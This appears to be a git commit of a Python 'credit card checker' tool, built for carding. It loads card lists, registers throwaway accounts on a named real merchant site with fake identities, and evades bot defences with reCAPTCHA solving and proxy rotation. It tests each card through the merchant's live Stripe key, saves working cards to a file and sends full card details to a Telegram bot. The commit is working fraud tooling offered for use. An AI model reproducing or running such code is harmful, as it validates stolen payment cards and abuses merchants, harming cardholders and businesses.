first commi

This commit is contained in:
dela
2025-12-31 17:33:09 +08:00
commit d299afd4ae
53 changed files with 4358 additions and 0 deletions

View File

@@ -0,0 +1,20 @@
"""Checker包主入口"""
__version__ = '0.2.0'
__author__ = 'Your Name'
__description__ = 'Credit card checker tool'
from .models import Card, CheckResult, CheckStatus, BinInfo
from .checkers import StripeChecker
from .cards import parse_card_file, deduplicate_cards, lookup_bin
__all__ = [
'Card',
'CheckResult',
'CheckStatus',
'BinInfo',
'StripeChecker',
'parse_card_file',
'deduplicate_cards',
'lookup_bin',
]

View File

@@ -0,0 +1,5 @@
"""允许通过 python -m checker 运行"""
from checker.cli import main
if __name__ == '__main__':
main()

View File

@@ -0,0 +1,9 @@
"""卡片处理模块"""
from .parser import parse_card_file, deduplicate_cards
from .bin_lookup import lookup_bin
__all__ = [
'parse_card_file',
'deduplicate_cards',
'lookup_bin',
]

View File

@@ -0,0 +1,37 @@
"""BIN信息查询服务"""
import requests
from typing import Optional
from ..models import BinInfo
from ..utils.strings import gstr
def lookup_bin(bin_number: str, session: Optional[requests.Session] = None) -> BinInfo:
"""查询BIN信息
Args:
bin_number: BIN号码前6位
session: requests会话对象如果为None则创建新会话
Returns:
BinInfo对象
"""
if session is None:
session = requests.Session()
try:
url = f'https://bins.antipublic.cc/bins/{bin_number}'
response = session.get(url, timeout=10)
text = response.text
return BinInfo(
bin=bin_number,
brand=gstr(text, 'brand":"', '"').upper() or 'UNKNOWN',
country=gstr(text, 'country_name":"', '"').upper() or 'UNKNOWN',
country_flag=gstr(text, 'country_flag":"', '"') or 'UNKNOWN',
bank=gstr(text, 'bank":"', '"').upper() or 'UNKNOWN',
card_type=gstr(text, 'type":"', '"').upper() or 'UNKNOWN',
level=gstr(text, 'level":"', '"').upper() or 'UNKNOWN',
)
except Exception:
return BinInfo(bin=bin_number)

View File

@@ -0,0 +1,53 @@
"""卡片文件解析器"""
from typing import List
from ..models import Card
def parse_card_file(file_path: str) -> List[Card]:
"""解析卡片文件
Args:
file_path: 卡片文件路径
Returns:
Card对象列表
Raises:
FileNotFoundError: 文件不存在
UnicodeDecodeError: 文件编码错误
"""
with open(file_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
cards = []
for line in lines:
line = line.strip()
if not line:
continue
card = Card.parse(line)
if card:
cards.append(card)
return cards
def deduplicate_cards(cards: List[Card]) -> List[Card]:
"""去除重复卡片
Args:
cards: 卡片列表
Returns:
去重后的卡片列表
"""
seen = set()
unique_cards = []
for card in cards:
key = card.formatted
if key not in seen:
seen.add(key)
unique_cards.append(card)
return unique_cards

View File

@@ -0,0 +1,4 @@
"""检测器模块"""
from .stripe import StripeChecker
__all__ = ['StripeChecker']

View File

@@ -0,0 +1,631 @@
"""Stripe支付网关检测器
这个模块包含了完整的Stripe卡片检测流程包括
1. 账户注册
2. 卡片令牌化
3. 3DS验证
4. 结果判断
"""
import uuid
import secrets
import string
import random
import time
import datetime
import sys
import base64
import json
import socket
import logging
import threading
from typing import Tuple, Optional, List
import requests
from requests import exceptions
import urllib3
from faker import Faker
from colorama import Fore, Style
from ..models import Card, CheckResult, CheckStatus
from ..cards import lookup_bin
from ..utils import format_ts, sleep_random, generate_password, gstr, get_random_ua, UA
from ..integrations import RecaptchaSolver, ProxyRotator, send_telegram_message
logger = logging.getLogger(__name__)
# 线程锁
print_lock = threading.Lock()
file_lock = threading.Lock()
sent_lock = threading.Lock()
# Telegram已发送集合
sent_telegram = set()
class StripeChecker:
"""Stripe支付网关检测器"""
# 临时邮箱域名列表
EMAIL_DOMAINS = [
'startmail.com', 'runbox.com', 'posteo.de', 'openmailbox.org', 'safe-mail.net',
'keemail.me', 'mykolab.com', 'eclipso.eu', 'neomailbox.com', 'mailbox.org',
'msgsafe.io', 'torguard.tg', 'vfemail.net', 'scryptmail.com', 'luxsci.com',
'onmail.com', 'simplelogin.io', 'anonaddy.com', 'duck.com', 'pm.me',
'swissmail.org', 'kolabnow.com', 'mailnesia.com', 'spamgourmet.com',
'mailsac.com', 'relay.firefox.com', 'emailondeck.com', 'moakt.com',
'maildrop.cc', 'nowmymail.com', 'throwawaymail.com', 'mailcatch.com',
'mailnull.com', 'spamavert.com', 'mail-temporaire.fr', 'rcpt.at',
'mailnesia.com', 'spambfree24.org', 'temp-mail.io', 'easytrashmail.com',
'inboxkitten.com', 'trashmail.de', 'wh4f.org', 'vibemail.net',
'spamex.com', 'trbvm.com', 'getairmail.com', 'webemail.me',
]
# Stripe公钥
STRIPE_PK = 'pk_live_51PNnUYCpbsAx05ZQuvx5UVPB6OydHAwDUFaKTeblYjQDucB8985OeQ6ceodC9EhWgClX2wvS7jaVTSNnr0SkektW00mh3KBqQ3'
def __init__(
self,
timeout: int = 15,
max_retries: int = 5,
telegram_token: Optional[str] = None,
telegram_chat_id: Optional[str] = None
):
"""初始化检测器
Args:
timeout: 请求超时时间
max_retries: 最大重试次数
telegram_token: Telegram bot token
telegram_chat_id: Telegram chat ID
"""
self.timeout = timeout
self.max_retries = max_retries
self.telegram_token = telegram_token
self.telegram_chat_id = telegram_chat_id
def _generate_user_data(self) -> Tuple[str, str, str]:
"""生成用户数据(用户名、密码、邮箱)"""
# 生成密码
password = generate_password(10, 16)
# 生成用户名
username_chars = string.ascii_lowercase + string.digits + '._'
alnum = string.ascii_lowercase + string.digits
length = secrets.choice(range(6, 13))
first = secrets.choice(alnum)
last = secrets.choice(alnum)
middle = []
prev = ''
for _ in range(max(0, length - 2)):
ch = secrets.choice(username_chars)
while prev in '._' and ch in '._':
ch = secrets.choice(alnum)
middle.append(ch)
prev = ch
base = first + ''.join(middle) + last
uniq = uuid.uuid4().hex[:4]
username = (base + uniq)[:length]
# 生成临时邮箱
email = f"{username}@{random.choice(self.EMAIL_DOMAINS)}"
return username, password, email
def _solve_recaptcha(self, proxy_rotator: ProxyRotator) -> Optional[str]:
"""求解reCAPTCHA"""
try:
anchor_url = (
'https://www.google.com/recaptcha/api2/anchor?ar=1&'
'k=6LfAYREqAAAAAGMmzJpVy-ZtfdQgCuGSBRx8f321&'
'co=aHR0cHM6Ly93d3cud29tZW5zYWlkLm9yZy51azo0NDM.&'
'hl=en&v=bGi-DxR800FVc7f0siDI2jNQ&size=invisible&'
'anchor-ms=20000&execute-ms=15000&cb=6mmplhhp955x'
)
solver = RecaptchaSolver(timeout=20, proxy_rotator=proxy_rotator)
return solver.solve(anchor_url)
except Exception as e:
logger.warning(f'reCAPTCHA solve failed: {e}')
return None
def check(
self,
card: Card,
session: requests.Session,
proxy_list: Optional[List[str]] = None
) -> CheckResult:
"""检测卡片
Args:
card: 卡片对象
session: requests会话
proxy_list: 代理列表
Returns:
CheckResult对象
"""
# 初始化ID
session_uuid = str(uuid.uuid4())
GUID = str(uuid.uuid4())
MUID = str(uuid.uuid4())
SID = str(uuid.uuid4())
# 查询BIN信息
bin_info = lookup_bin(card.bin, session)
# 生成用户数据
username, password, email = self._generate_user_data()
sleep_random(1, 3)
# 生成时间戳
timeunix = str(int(time.time()))[:7]
ts_now = format_ts(datetime.datetime.now(datetime.timezone.utc))
# 生成Faker数据
fake = Faker('en_US')
first_name = fake.first_name_male()
last_name = fake.last_name_male()
# 代理轮换器
proxy_rotator = ProxyRotator(proxy_list)
tried_proxies = set()
# 重试循环
for attempt in range(1, self.max_retries + 1):
try:
# 选择代理
if proxy_list and len(tried_proxies) >= len(proxy_list):
return CheckResult(
card=card,
status=CheckStatus.UNKNOWN,
message="No proxy available",
bin_info=bin_info
)
proxies = proxy_rotator.get()
if proxies and proxy_list:
proxy_str = proxies.get('http')
if proxy_str in tried_proxies:
continue
tried_proxies.add(proxy_str)
# 1. 求解reCAPTCHA
token = self._solve_recaptcha(proxy_rotator)
if not token:
logger.warning('Failed to solve reCAPTCHA, continuing anyway')
# 2. 访问My Account页面
headers = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'user-agent': get_random_ua()
}
response = session.get(
'https://ihorangi.ac.nz/my-account/',
headers=headers,
proxies=proxies,
timeout=self.timeout
)
# 提取nonce
wogreg = gstr(response.text, 'woocommerce-register-nonce" value="', '"')
# 3. 注册账户
headers['content-type'] = 'application/x-www-form-urlencoded'
headers['origin'] = 'https://ihorangi.ac.nz'
headers['referer'] = 'https://ihorangi.ac.nz/my-account/'
data = {
'email': email,
'wc_order_attribution_source_type': 'typein',
'wc_order_attribution_session_start_time': ts_now,
'wc_order_attribution_user_agent': get_random_ua(),
'woocommerce-register-nonce': wogreg,
'_wp_http_referer': '/my-account/',
'register': 'Register'
}
response = session.post(
'https://ihorangi.ac.nz/my-account/',
headers=headers,
data=data,
proxies=proxies,
timeout=self.timeout
)
if response.status_code not in (200, 301, 302):
time.sleep(random.uniform(5, 10))
continue
# 4. 访问支付方式页面
session.get(
'https://ihorangi.ac.nz/my-account/payment-methods/',
headers=headers,
proxies=proxies,
timeout=self.timeout
)
# 5. 获取添加支付方式页面
response = session.get(
'https://ihorangi.ac.nz/my-account/add-payment-method/',
headers=headers,
proxies=proxies,
timeout=self.timeout
)
stpnonce = gstr(response.text, 'createAndConfirmSetupIntentNonce": "', '"')
if not stpnonce:
stpnonce = gstr(response.text, 'createAndConfirmSetupIntentNonce":"', '"')
# 6. Stripe Elements Session
headers = {
'accept': 'application/json',
'content-type': 'application/x-www-form-urlencoded',
'origin': 'https://js.stripe.com',
'referer': 'https://js.stripe.com/',
'user-agent': get_random_ua()
}
url = (
f'https://api.stripe.com/v1/elements/sessions?'
f'deferred_intent[mode]=setup&'
f'deferred_intent[currency]=nzd&'
f'deferred_intent[payment_method_types][0]=card&'
f'deferred_intent[setup_future_usage]=off_session&'
f'currency=nzd&'
f'key={self.STRIPE_PK}&'
f'_stripe_version=2024-06-20&'
f'elements_init_source=stripe.elements&'
f'referrer_host=ihorangi.ac.nz&'
f'stripe_js_id={session_uuid}&'
f'locale=en&'
f'type=deferred_intent'
)
session.get(url, headers=headers, timeout=self.timeout, proxies=proxies)
# 6.1 Link Cookie
headers_link = {
'accept': 'application/json',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'no-cache',
'content-type': 'application/x-www-form-urlencoded',
'origin': 'https://js.stripe.com',
'pragma': 'no-cache',
'priority': 'u=1, i',
'referer': 'https://js.stripe.com/',
'user-agent': get_random_ua()
}
params_link = {'referrer_host': 'ihorangi.ac.nz'}
session.get(
'https://merchant-ui-api.stripe.com/link/get-cookie',
params=params_link,
headers=headers_link,
proxies=proxies,
timeout=self.timeout
)
# 6.2 hCaptcha Check
headers_hcap = {
'accept': 'application/json',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'no-cache',
'content-type': 'text/plain',
'origin': 'https://newassets.hcaptcha.com',
'pragma': 'no-cache',
'priority': 'u=1, i',
'referer': 'https://newassets.hcaptcha.com/',
'user-agent': get_random_ua()
}
params_hcap = {
'v': '2e2f9feae51e15dd4676ba8e3d761ec72f41b826',
'host': 'b.stripecdn.com',
'sitekey': '463b917e-e264-403f-ad34-34af0ee10294',
'sc': '1',
'swa': '1',
'spst': '0'
}
session.post(
'https://api.hcaptcha.com/checksiteconfig',
params=params_hcap,
headers=headers_hcap,
proxies=proxies,
timeout=self.timeout
)
# 7. 创建Payment Method
data = (
f'type=card&'
f'card[number]={card.number}&'
f'card[cvc]={card.cvv}&'
f'card[exp_year]={card.year[-2:]}&'
f'card[exp_month]={card.month}&'
f'allow_redisplay=unspecified&'
f'billing_details[address][country]=NZ&'
f'pasted_fields=number%2Ccvc&'
f'payment_user_agent=stripe.js%2F8c194b4c2c%3B+stripe-js-v3%2F8c194b4c2c%3B+payment-element%3B+deferred-intent&'
f'referrer=https%3A%2F%2Fihorangi.ac.nz&'
f'time_on_page={timeunix}&'
f'client_attribution_metadata[client_session_id]=2b694de4-a99f-4708-9cd4-089e3a463ff5&'
f'client_attribution_metadata[merchant_integration_source]=elements&'
f'client_attribution_metadata[merchant_integration_subtype]=payment-element&'
f'client_attribution_metadata[merchant_integration_version]=2021&'
f'client_attribution_metadata[payment_intent_creation_flow]=deferred&'
f'client_attribution_metadata[payment_method_selection_flow]=merchant_specified&'
f'client_attribution_metadata[elements_session_config_id]=47f07f96-4b09-4cf0-9d48-4343573d8fa2&'
f'client_attribution_metadata[merchant_integration_additional_elements][0]=payment&'
f'guid={GUID}&'
f'muid={MUID}&'
f'sid={SID}&'
f'key={self.STRIPE_PK}&'
f'_stripe_version=2024-06-20'
)
headers_pm = {
'accept': 'application/json',
'accept-language': 'en-US,en;q=0.9,id;q=0.8',
'cache-control': 'no-cache',
'content-type': 'application/x-www-form-urlencoded',
'origin': 'https://js.stripe.com',
'pragma': 'no-cache',
'priority': 'u=1, i',
'referer': 'https://js.stripe.com/',
'user-agent': get_random_ua()
}
response = session.post(
'https://api.stripe.com/v1/payment_methods',
headers=headers_pm,
data=data,
timeout=self.timeout,
proxies=proxies
)
if response.status_code != 200:
msg = gstr(response.text, 'message": "', '"')
with print_lock:
print(
f"{Fore.LIGHTRED_EX}{Fore.LIGHTWHITE_EX}{card.formatted} "
f"{Fore.LIGHTWHITE_EX}- {Fore.CYAN}{response.status_code} "
f"{Fore.LIGHTWHITE_EX}- {Fore.LIGHTRED_EX}{msg}{Style.RESET_ALL}"
)
return CheckResult(
card=card,
status=CheckStatus.DEAD,
message=msg or 'payment_methods_failed',
bin_info=bin_info
)
idtoken = gstr(response.text, 'id": "', '"')
# 8. 确认Setup Intent
headers['content-type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
headers['origin'] = 'https://ihorangi.ac.nz'
headers['referer'] = 'https://ihorangi.ac.nz/my-account/add-payment-method/'
headers['x-requested-with'] = 'XMLHttpRequest'
data = {
'action': 'wc_stripe_create_and_confirm_setup_intent',
'wc-stripe-payment-method': idtoken,
'wc-stripe-payment-type': 'card',
'_ajax_nonce': stpnonce
}
response = session.post(
'https://ihorangi.ac.nz/wp-admin/admin-ajax.php',
headers=headers,
data=data,
timeout=self.timeout,
proxies=proxies
)
# 解析结果
result = self._parse_result(response, card, bin_info)
# 处理需要重试的情况
if result.message == 'RETRY':
time.sleep(random.uniform(5, 10))
continue
return result
except KeyboardInterrupt:
sys.exit(1)
except Exception as e:
hint = self._handle_exception(e)
with print_lock:
print(
f"{Fore.LIGHTRED_EX}{Fore.LIGHTWHITE_EX}{card.formatted} "
f"{Fore.LIGHTWHITE_EX}- {Fore.RED}{Fore.YELLOW}{hint}{Style.RESET_ALL}"
)
continue
# 达到最大重试次数
return CheckResult(
card=card,
status=CheckStatus.UNKNOWN,
message="Max attempts reached",
bin_info=bin_info
)
def _parse_result(
self,
response: requests.Response,
card: Card,
bin_info
) -> CheckResult:
"""解析响应结果"""
try:
resp = response.json()
except ValueError:
resp = {}
text = response.text.lower()
text_orig = response.text
# 提取data
if isinstance(resp, dict) and 'data' in resp:
data = resp['data']
else:
data = resp
status = str(data.get('status', '')).lower()
# 检查各种成功情况
if (
(isinstance(resp, dict) and resp.get('success') is True) or
'succeeded' in status or
'succeeded' in text
):
return self._handle_success(card, bin_info, "Succeeded")
# 需要3DS
if 'requires_action' in status or 'requires_action' in text:
with print_lock:
print(
f"{Fore.YELLOW}{Fore.WHITE}{card.formatted} "
f"{Fore.LIGHTWHITE_EX}- {Fore.YELLOW}3DS Required.{Style.RESET_ALL}"
)
return CheckResult(
card=card,
status=CheckStatus.UNKNOWN,
message="3DS required",
bin_info=bin_info
)
# 需要支付方式(通常是拒绝)
if 'requires_payment_method' in status or 'requires_payment_method' in text:
msg = (
gstr(text_orig, 'message": "', '"') or
gstr(text_orig, '"code": "', '"') or
gstr(text_orig, '"decline_code": "', '"')
)
with print_lock:
print(
f"{Fore.RED}{Fore.WHITE}{card.formatted} "
f"{Fore.LIGHTWHITE_EX}- {Fore.RED}{msg}{Style.RESET_ALL}"
)
return CheckResult(
card=card,
status=CheckStatus.DEAD,
message=msg or 'requires_payment_method',
bin_info=bin_info
)
# 余额不足(通常视为成功)
if 'insufficient_funds' in text or 'insufficient funds' in text:
return self._handle_success(card, bin_info, "Insufficient Funds")
# 速率限制
if 'You cannot add a new payment method so soon' in text_orig:
with print_lock:
print(
f"{Fore.LIGHTYELLOW_EX}{Fore.LIGHTWHITE_EX}{card.formatted} "
f"{Fore.LIGHTWHITE_EX}- {Fore.LIGHTYELLOW_EX}RETRY "
f"{Fore.LIGHTWHITE_EX}- {Fore.LIGHTYELLOW_EX}IP temporarily blocked{Style.RESET_ALL}"
)
return CheckResult(
card=card,
status=CheckStatus.UNKNOWN,
message="RETRY",
bin_info=bin_info
)
# 默认失败
msg = gstr(text_orig, 'message":"', '"') or 'Unknown error'
with print_lock:
print(
f"{Fore.LIGHTRED_EX}{Fore.LIGHTWHITE_EX}{card.formatted} "
f"{Fore.LIGHTWHITE_EX}- {Fore.RED}{msg}{Style.RESET_ALL}"
)
return CheckResult(
card=card,
status=CheckStatus.DEAD,
message=msg,
bin_info=bin_info
)
def _handle_success(self, card: Card, bin_info, reason: str) -> CheckResult:
"""处理成功情况"""
with print_lock:
print(
f"{Fore.LIGHTGREEN_EX}{Fore.WHITE}{card.formatted} "
f"{Fore.LIGHTWHITE_EX}- {Fore.GREEN}Charged ({reason}).{Style.RESET_ALL}"
)
# 保存到文件
with file_lock:
with open('approvedcard.txt', 'a', encoding='utf-8') as f:
f.write(f"{card.formatted}|{reason.upper().replace(' ', '_')}|\n")
# 发送Telegram通知
if self.telegram_token and self.telegram_chat_id:
with sent_lock:
card_key = card.formatted
if card_key not in sent_telegram:
msg = (
f"<b>Stripe Charge 0.10$</b>\n\n"
f"<b>CC</b> : <code>{card.formatted}</code>\n"
f"<b>Status</b> : Charged!✅\n"
f"<b>Response</b> : {reason}\n"
f"<b>Gates</b> : Stripe Charge\n\n"
f"<b>Bin</b> : {card.bin} - "
f"<b>Brand</b> : {bin_info.brand} - "
f"<b>Type</b> : {bin_info.card_type} - "
f"<b>Country</b> : {bin_info.country} {bin_info.country_flag} - "
f"<b>Issuer</b> : {bin_info.bank}"
)
send_telegram_message(
self.telegram_token,
self.telegram_chat_id,
msg,
timeout=10
)
sent_telegram.add(card_key)
return CheckResult(
card=card,
status=CheckStatus.LIVE,
message=reason,
bin_info=bin_info
)
def _handle_exception(self, e: Exception) -> str:
"""处理异常并返回友好提示"""
err_msg = str(e).lower()
if isinstance(e, exceptions.ConnectTimeout):
return 'Connection timed out while connecting to host.'
elif isinstance(e, exceptions.ReadTimeout):
return 'Server took too long to respond.'
elif isinstance(e, exceptions.Timeout):
return 'Request timeout.'
elif isinstance(e, socket.timeout):
return 'Socket-level timeout occurred.'
elif isinstance(e, exceptions.ConnectionError):
if 'reset' in err_msg:
return 'Connection reset by peer.'
elif 'refused' in err_msg:
return 'Connection refused.'
elif 'aborted' in err_msg:
return 'Connection aborted.'
return 'General connection error.'
elif isinstance(e, exceptions.ProxyError):
if 'cannot connect' in err_msg:
return 'Proxy unreachable.'
elif 'timed out' in err_msg:
return 'Proxy timeout.'
elif '407' in err_msg:
return 'Proxy authentication required.'
return 'General proxy error.'
elif isinstance(e, (exceptions.SSLError, urllib3.exceptions.SSLError)):
return 'SSL/TLS error.'
elif isinstance(e, exceptions.HTTPError):
if '429' in err_msg:
return 'Rate limited.'
elif '403' in err_msg:
return 'Forbidden.'
return 'HTTP error.'
return f'{type(e).__name__}: {str(e)}'

View File

@@ -0,0 +1,4 @@
"""CLI模块"""
from .app import main
__all__ = ['main']

View File

@@ -0,0 +1,148 @@
"""CLI主应用程序"""
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import init as colorama_init
from ..core.config import MAX_THREADS, DEFAULT_THREADS
from ..cards import parse_card_file, deduplicate_cards
from ..checkers import StripeChecker
from ..integrations import load_proxy_list
from ..models import CheckStatus
from .banner import (
clear_screen,
show_banner,
show_separator,
show_social_info,
show_license_info,
show_statistics,
show_results
)
from .prompts import (
prompt_telegram_config,
prompt_card_file,
prompt_proxy_input,
prompt_threads
)
# 初始化Colorama
colorama_init(autoreset=True)
def main():
"""主函数"""
try:
# 显示欢迎界面
clear_screen()
show_banner('CHK-TOOLS')
show_separator()
show_license_info()
show_separator()
show_social_info()
show_separator()
# 获取Telegram配置
tg_token, tg_chat_id = prompt_telegram_config()
# 获取卡片文件
card_file = prompt_card_file()
# 解析卡片
try:
cards = parse_card_file(card_file)
cards = deduplicate_cards(cards)
except FileNotFoundError:
print(f"\n[ERROR] Unable to read file: {card_file}\n")
return
except UnicodeDecodeError:
print(f"\n[ERROR] File must be in UTF-8 encoding.\n")
return
if not cards:
print(f"\n[ERROR] No card data found in {card_file}\n")
return
# 获取代理配置
proxy_input = prompt_proxy_input()
proxy_list = load_proxy_list(proxy_input)
# 获取线程数
threads = prompt_threads(MAX_THREADS, DEFAULT_THREADS)
# 显示运行信息
clear_screen()
show_banner('StripeAuth')
show_separator()
show_license_info()
show_separator()
show_statistics(
total_cards=len(cards),
proxy_count=len(proxy_list),
threads=threads,
max_retry=MAX_THREADS
)
show_separator()
# 初始化检测器
checker = StripeChecker(
timeout=15,
max_retries=5,
telegram_token=tg_token,
telegram_chat_id=tg_chat_id
)
# 统计变量
cnt_live = 0
cnt_dead = 0
cnt_unknown = 0
start = time.perf_counter()
# 使用线程池执行检测
import requests
with ThreadPoolExecutor(max_workers=threads) as executor:
# 为每个卡片创建独立的session
futures = {}
for card in cards:
session = requests.Session()
future = executor.submit(checker.check, card, session, proxy_list)
futures[future] = session
# 处理完成的任务
for future in as_completed(futures):
session = futures[future]
try:
result = future.result()
if result.status == CheckStatus.LIVE:
cnt_live += 1
elif result.status == CheckStatus.DEAD:
cnt_dead += 1
else:
cnt_unknown += 1
finally:
session.close()
elapsed = time.perf_counter() - start
# 显示结果
show_results(
total_checked=len(cards),
elapsed=elapsed,
live=cnt_live,
dead=cnt_dead,
unknown=cnt_unknown
)
except KeyboardInterrupt:
print('\n\nExit requested.\n')
sys.exit(0)
except Exception as e:
print(f'\n\nError: {e}\n')
raise
if __name__ == '__main__':
main()

View File

@@ -0,0 +1,102 @@
"""Banner和UI显示"""
import os
import random
import pyfiglet
from colorama import Fore, Style
def clear_screen():
"""清理屏幕"""
os.system('cls' if os.name == 'nt' else 'clear')
def pick_gradient():
"""选择随机渐变色(简化版)"""
return ['#ff0000', '#00ff00']
def color_gradient_text(text, gradient):
"""渐变色文本(简化版,直接返回)"""
return text
def show_banner(title: str = 'CHK-TOOLS', font: str = 'ansi_shadow'):
"""显示Banner
Args:
title: Banner标题
font: 字体名称
"""
banner = pyfiglet.figlet_format(title, font=font)
gradient = pick_gradient()
print(color_gradient_text(banner, gradient))
def show_separator():
"""显示分隔线"""
print('- ' * 35)
def show_social_info():
"""显示社交信息"""
print(f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Github {Fore.RED}: {Fore.YELLOW}github.com/KianSantang777")
print(f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Telegram {Fore.RED}: {Fore.YELLOW}t.me/xqndrs")
def show_license_info(license_info: str = "License Active"):
"""显示许可证信息
Args:
license_info: 许可证信息字符串
"""
print(f"{Fore.GREEN}{license_info}{Style.RESET_ALL}")
def show_statistics(
total_cards: int,
proxy_count: int,
threads: int,
max_retry: int,
output_file: str = 'approvedcard.txt'
):
"""显示统计信息
Args:
total_cards: 总卡片数
proxy_count: 代理数量
threads: 线程数
max_retry: 最大重试次数
output_file: 输出文件名
"""
print(f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Total card {Fore.YELLOW}: {Fore.YELLOW}{total_cards}{Style.RESET_ALL}")
if proxy_count > 0:
print(f"{Fore.YELLOW}[✓]{Fore.LIGHTWHITE_EX} Use {Fore.YELLOW}{proxy_count} {Fore.LIGHTWHITE_EX}proxies.")
else:
print(f"{Fore.RED}[x] {Fore.LIGHTWHITE_EX}No proxy loaded. Continuing without proxy.{Style.RESET_ALL}")
print(f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Total threads {Fore.YELLOW}: {Fore.YELLOW}{threads}{Style.RESET_ALL}")
print(f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Max retry {Fore.YELLOW}: {Fore.YELLOW}{max_retry}{Style.RESET_ALL}")
print(f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Live card saved to {Fore.YELLOW}: {Fore.LIGHTGREEN_EX}{output_file}{Style.RESET_ALL}")
def show_results(total_checked: int, elapsed: float, live: int, dead: int, unknown: int):
"""显示最终结果
Args:
total_checked: 总检测数
elapsed: 耗时
live: 活卡数
dead: 死卡数
unknown: 未知数
"""
print('\n' + '- ' * 35)
print(
f"{Style.RESET_ALL}DONE. Checked {Fore.YELLOW}{total_checked}{Style.RESET_ALL} "
f"cards in {Fore.YELLOW}{elapsed:.2f} {Style.RESET_ALL}seconds."
)
print(
f"RESULTS: {Fore.LIGHTGREEN_EX}LIVE: {Style.RESET_ALL}{live}, "
f"{Fore.RED}DEAD: {Style.RESET_ALL}{dead}, "
f"{Fore.LIGHTYELLOW_EX}UNKNOWN: {Style.RESET_ALL}{unknown}\n\n"
)

View File

@@ -0,0 +1,104 @@
"""用户交互提示"""
from colorama import Fore, Style
def prompt_telegram_config():
"""提示输入Telegram配置
Returns:
(token, chat_id) 元组
"""
token = input(
f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Telegram Bot Token "
f"{Fore.MAGENTA}[{Fore.YELLOW}Enter to skip{Fore.MAGENTA}]{Fore.WHITE}: "
).strip()
if not token:
return None, None
chat_id = input(
f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Telegram Chat ID: "
).strip()
if not chat_id:
return None, None
return token, chat_id
def prompt_card_file():
"""提示输入卡片文件路径
Returns:
文件路径
"""
path = input(
f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Enter card file path "
f"(ex: {Fore.YELLOW}card.txt{Style.RESET_ALL}): "
).strip()
return path or 'card.txt'
def prompt_proxy_input():
"""提示输入代理配置
Returns:
代理输入字符串
"""
print(
f"{Fore.RED}[!] {Fore.LIGHTRED_EX}Note: {Fore.YELLOW}"
f"Comma separated, ex: user:pass@ip:port, ip:port:user:pass{Style.RESET_ALL}"
)
proxy_input = input(
f"{Fore.RED}[+] {Fore.LIGHTWHITE_EX}Paste ur proxy kredensials "
f"{Style.RESET_ALL}{Fore.LIGHTBLACK_EX}[Press Enter to skip]{Style.RESET_ALL}: "
).strip()
return proxy_input
def prompt_threads(max_threads: int = 3, default_threads: int = 1):
"""提示输入线程数
Args:
max_threads: 最大线程数
default_threads: 默认线程数
Returns:
线程数
"""
try:
user_input = input(
f"{Fore.RED}[▪︎] {Fore.LIGHTWHITE_EX}Enter number of threads "
f"(max {Fore.RED}{max_threads}{Style.RESET_ALL}, "
f"default {Fore.LIGHTRED_EX}{default_threads}{Style.RESET_ALL}): "
).strip()
if not user_input:
return default_threads
threads = int(user_input)
if threads < 1:
print(
f"\n{Fore.RESET}[{Fore.LIGHTYELLOW_EX}WARN{Fore.RESET}] "
f"Minimum threads is 1. Using default {default_threads}.{Style.RESET_ALL}"
)
return default_threads
elif threads > max_threads:
print(
f"\n{Fore.RESET}[{Fore.LIGHTYELLOW_EX}WARN{Fore.RESET}] "
f"Max threads is {max_threads}. Using {max_threads} threads.{Style.RESET_ALL}"
)
return max_threads
return threads
except ValueError:
print(
f"{Fore.RESET}[{Fore.LIGHTYELLOW_EX}WARN{Fore.RESET}] "
f"Invalid input. Using default {default_threads} threads.{Style.RESET_ALL}"
)
return default_threads

View File

@@ -0,0 +1,19 @@
"""核心模块"""
from .config import (
MAX_THREADS,
DEFAULT_THREADS,
MIN_THREADS,
DEFAULT_TIMEOUT,
OUTPUT_FILE
)
from .settings import Settings, settings
__all__ = [
'MAX_THREADS',
'DEFAULT_THREADS',
'MIN_THREADS',
'DEFAULT_TIMEOUT',
'OUTPUT_FILE',
'Settings',
'settings',
]

View File

@@ -0,0 +1,16 @@
"""核心配置常量"""
# 线程配置
MAX_THREADS = 3
DEFAULT_THREADS = 1
MIN_THREADS = 1
# 超时配置
DEFAULT_TIMEOUT = 15
RECAPTCHA_TIMEOUT = 20
# 输出文件
OUTPUT_FILE = 'approvedcard.txt'
# 许可证默认标签
DEFAULT_LICENSE_LABEL = 'Stripeauth1'

View File

@@ -0,0 +1,40 @@
"""环境配置管理"""
import os
from typing import Optional
class Settings:
"""应用配置"""
def __init__(self):
"""从环境变量加载配置"""
self.telegram_token: Optional[str] = os.getenv('TELEGRAM_TOKEN')
self.telegram_chat_id: Optional[str] = os.getenv('TELEGRAM_CHAT_ID')
self.max_threads: int = int(os.getenv('MAX_THREADS', '3'))
self.default_threads: int = int(os.getenv('DEFAULT_THREADS', '1'))
self.timeout: int = int(os.getenv('TIMEOUT', '15'))
self.output_file: str = os.getenv('OUTPUT_FILE', 'approvedcard.txt')
@classmethod
def from_env(cls, env_file: str = '.env') -> 'Settings':
"""从.env文件加载配置
Args:
env_file: .env文件路径
Returns:
Settings实例
"""
if os.path.exists(env_file):
with open(env_file, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#') and '=' in line:
key, value = line.split('=', 1)
os.environ[key.strip()] = value.strip()
return cls()
# 全局设置实例
settings = Settings()

View File

@@ -0,0 +1,11 @@
"""集成模块"""
from .recaptcha import RecaptchaSolver
from .proxy import ProxyRotator, load_proxy_list
from .telegram import send_telegram_message
__all__ = [
'RecaptchaSolver',
'ProxyRotator',
'load_proxy_list',
'send_telegram_message',
]

View File

@@ -0,0 +1,5 @@
"""代理管理模块"""
from .rotator import ProxyRotator
from .loader import load_proxy_list
__all__ = ['ProxyRotator', 'load_proxy_list']

View File

@@ -0,0 +1,24 @@
"""代理加载器"""
import os
